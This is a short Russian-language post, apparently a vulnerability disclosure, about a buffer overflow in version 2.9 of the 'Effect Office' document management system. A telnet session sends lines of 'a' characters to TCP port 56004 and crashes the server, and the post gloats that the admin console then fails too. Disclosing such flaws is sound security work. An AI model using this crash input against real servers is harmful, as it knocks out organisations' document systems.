http://www.effectoffice.com/
- система документа оборота от компании "Гарант Интернэшнел" и она используется многими организациями для "эффективного"
документооборота организации. Система
падает из-за переполнения буфера при отправке нескольких строк в порт
TCP/56004.
Картина:
Cервак на нём все документы некой организации...
Тестирую версию 2.9:
hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnet>close
telnet>quit
hacker#
И после этого сервак мёртв. Более того если админ откроет консоль "Effect" и выберет:
>Список соединений.....
А он так и сделает... сомнений НЕТ :)) то появится всем нам знакомое окошечко:
Инструкция по адресу"0x77......".......
